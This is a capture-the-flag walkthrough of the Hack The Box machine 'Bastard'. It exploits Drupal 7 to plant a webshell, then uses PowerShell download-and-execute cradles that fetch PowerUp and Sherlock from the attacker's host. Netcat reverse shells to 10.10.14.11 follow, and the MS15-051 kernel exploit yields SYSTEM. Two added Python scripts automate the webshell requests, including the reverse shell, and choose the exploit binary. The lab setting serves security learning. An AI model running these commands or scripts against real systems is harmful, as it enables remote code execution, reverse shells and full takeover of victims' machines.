Hack The Box: Bastard




Difficulty: Medium
Machine Creator: ch4p
Tools Used: NMAP, Droopescan, Searchsploit, PHP, Burp Suite, Remote Code Execution (webshell), PowerShell Empire (PowerUp.ps1), Sherlock, Netcat

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.9

HTTP – Drupal


Droopescan

For Drupal we can use a tool called droopescan, which we can install with pip.

apt-get install python-pip
pip install droopescan

Now we can run droopescan against the remote server. This will take a while to finish.

droopescan scan drupal -u http://10.10.10.9

Searchsploit

We know this is a Drupal 7 server, so let's use searchsploit to see if there are any known vulnerabilities we may be able to use.

searchsploit drupal

Let's copy the exploit to our working directory.

cp /usr/share/exploitdb/exploits/php/webapps/41564.php .

The exploit is written in PHP and uses curl, so first install php-curl. We will then need to edit the exploit by hand to point it at the target.

apt-get install php-curl



Burp Suite

Let's set up port forwarding in Burp. Everything sent to localhost:1337 will be forwarded to 10.10.10.9:80, so the exploit's requests pass through Burp and we can inspect them.


Now set up the request handling.



Now we need to update the exploit's target URL to localhost:1337 so that its requests route through the proxy.







Exploit Execution



Remote Code Execution



Powershell Empire

We can look for privilege escalation vectors with PowerUp.ps1 from PowerShell Empire. Let's download PowerShell Empire.

git clone https://github.com/EmpireProject/Empire.git

Now that we have Empire downloaded, let's copy PowerUp.ps1 into our working directory so we can edit it and serve it.

cp Empire/data/module_source/privesc/PowerUp.ps1 .


Now we need to pull PowerUp.ps1 from our web server and execute it on the remote machine.

In the webshell we can add this command.

http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/PowerUp.ps1') | powershell -noprofile -


Looking at the results we see "access denied" on several checks, which tells us that we are not running with admin rights.

Going through the rest of the results, there is nothing that can help us elevate our privileges.

Sherlock

Let's try finding a vulnerability using Sherlock.ps1, which checks the host for missing patches that have known local privilege escalation exploits.

wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1

We can serve and execute Sherlock the same way we did PowerUp.

http://10.10.10.9/exploit.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.11:8000/Sherlock.ps1') | powershell -noprofile -

Reverse Shell Netcat

Before we do our privilege escalation we need a proper remote shell. We can get one with the 64-bit build of netcat for Windows.

wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

Unzip the netcat files so we can upload and run them.

Setup our netcat listener.

nc -lvnp 8081

Make sure the Python SimpleHTTPServer is still running on port 8000, since the webshell will fetch nc64.exe from it.

python -m SimpleHTTPServer 8000

Enter the following URL in the browser to upload nc64.exe and spawn a reverse shell back to our listener.

http://10.10.10.9/exploit.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.11 8081
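The PowerUp, Sherlock and netcat steps above are all the same action: a GET request to exploit.php with a command in fexec (and optionally a file name in fupload). Typing those URLs into a browser works, but pipes, quotes and parentheses need URL-encoding and are easy to mangle. The following is an added example of mine, not code from this writeup or from the Drupal exploit: a small Python 3 client that builds and sends those requests. It assumes exploit.php behaves as the URLs above imply (fexec is run through cmd.exe, fupload names a file to fetch); the function names and the ATTACKER/HTTP_PORT constants are my own.

```python
"""Client for the exploit.php webshell dropped on the Drupal host (added example, not the writeup's code)."""
import urllib.parse
import urllib.request
from typing import Optional

TARGET = "http://10.10.10.9/exploit.php"   # webshell written by the Services exploit
ATTACKER = "10.10.14.11"                    # our address as used in the writeup's URLs
HTTP_PORT = 8000                            # port of the python -m SimpleHTTPServer serving our tools


def ps_cradle(script_url: str) -> str:
    """PowerShell download-and-execute cradle used for PowerUp.ps1 and Sherlock.ps1.

    The script text is echoed into 'powershell -' (read from stdin) because the
    webshell hands our string to cmd.exe, not to PowerShell directly.
    """
    return ("echo IEX(New-Object Net.WebClient).DownloadString('%s') | powershell -noprofile -"
            % script_url)


def nc_reverse(binary: str, port: int, host: str = ATTACKER) -> str:
    """Command line for a netcat reverse shell, e.g. 'nc64.exe -e cmd 10.10.14.11 8081'."""
    return f"{binary} -e cmd {host} {port}"


def build_url(fexec: Optional[str] = None, fupload: Optional[str] = None,
              base: str = TARGET) -> str:
    """Percent-encode the parameters so that spaces, |, ' and ( ) survive the trip."""
    params = {}
    if fupload:
        params["fupload"] = fupload
    if fexec:
        params["fexec"] = fexec
    # quote (not quote_plus) so spaces become %20 rather than '+'; PHP decodes both.
    return base + "?" + urllib.parse.urlencode(params, quote_via=urllib.parse.quote)


def decode_query(url: str) -> dict:
    """Reverse build_url: the exact strings the webshell will see in $_GET."""
    query = urllib.parse.urlsplit(url).query
    return {k: v[0] for k, v in urllib.parse.parse_qs(query).items()}


def run(fexec: Optional[str] = None, fupload: Optional[str] = None, timeout: int = 30) -> str:
    """Send one request to the webshell and return the raw response body."""
    url = build_url(fexec, fupload)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Stage 1: run PowerUp through the cradle and show its output.
    print(run(fexec=ps_cradle(f"http://{ATTACKER}:{HTTP_PORT}/PowerUp.ps1")))
    # Stage 2: upload nc64.exe and connect back to 'nc -lvnp 8081'. The request
    # never returns while the shell is alive, so a short timeout is expected.
    try:
        run(fexec=nc_reverse("nc64.exe", 8081), fupload="nc64.exe", timeout=5)
    except Exception:
        pass
```

The reverse-shell request blocks for as long as the shell lives, because cmd.exe never returns to the webshell; the timeout in the script is there for that reason and is not an error.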


Privilege Escalation


https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051


MS15-051 exploit

http://10.10.10.9/exploit.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
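Sherlock reports candidate bulletins, and the MS15-051 step above then runs a kernel exploit on the strength of that report. An added example of mine, not Sherlock's logic and not code from this writeup: a Python 3 check that parses the hotfix list and architecture out of `systeminfo` output, reports whether the KB that fixes MS15-051 (KB3045171) is installed, and picks the x64 or x86 binary name from the SecWiki repository accordingly. The systeminfo text is a constructed sample, not a capture from the box; the function names are my own.

```python
"""Pre-flight check before throwing a Windows kernel exploit (added example, not the writeup's code)."""
import re

# Constructed sample of `systeminfo` output for this example; not captured from the target.
SAMPLE_SYSTEMINFO = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2999226
                           [02]: KB3042058
"""

# Bulletin -> KB that fixes it. MS15-051 (CVE-2015-1701, win32k.sys) shipped as KB3045171.
PATCHES = {"MS15-051": "KB3045171"}


def installed_hotfixes(systeminfo: str) -> set:
    """KB numbers listed under Hotfix(s) in systeminfo output."""
    return set(re.findall(r"\[\d+\]:\s*(KB\d+)", systeminfo))


def system_arch(systeminfo: str) -> str:
    """'x64' or 'x86' from the 'System Type:' line (defaults to x86 if absent)."""
    m = re.search(r"System Type:\s*(x64|x86|X86)-based", systeminfo)
    return "x64" if m and m.group(1).lower() == "x64" else "x86"


def missing_patches(systeminfo: str, patches: dict = PATCHES) -> dict:
    """Bulletins whose fixing KB is not in the hotfix list."""
    have = installed_hotfixes(systeminfo)
    return {bulletin: kb for bulletin, kb in patches.items() if kb not in have}


def exploit_binary(systeminfo: str, bulletin: str = "MS15-051"):
    """Name of the SecWiki binary for this host's architecture, or None if the KB is present."""
    if bulletin not in missing_patches(systeminfo):
        return None
    return f"{bulletin.lower()}{system_arch(systeminfo)}.exe"


if __name__ == "__main__":
    # Paste the real `systeminfo` output from the webshell in place of the sample.
    print("missing:", missing_patches(SAMPLE_SYSTEMINFO))
    print("binary to upload:", exploit_binary(SAMPLE_SYSTEMINFO))
```

A missing KB is a hint, not proof: a later cumulative rollup can supersede KB3045171 without it ever appearing in the hotfix list, which is why Sherlock checks the version of win32k.sys instead. Use the hotfix check to avoid uploading the wrong architecture's binary, and trust a failed `whoami` test over either heuristic.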

Privileged Netcat

Similar to the previous netcat step, we are going to have the exploit execute the nc64.exe we already uploaded and create a second reverse shell, this one running as SYSTEM.

nc -lvnp 8082

http://10.10.10.9/exploit.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.11 8082"

User.txt and Root.txt





#Drupal #hackthebox #RCE #RemoteCodeExecution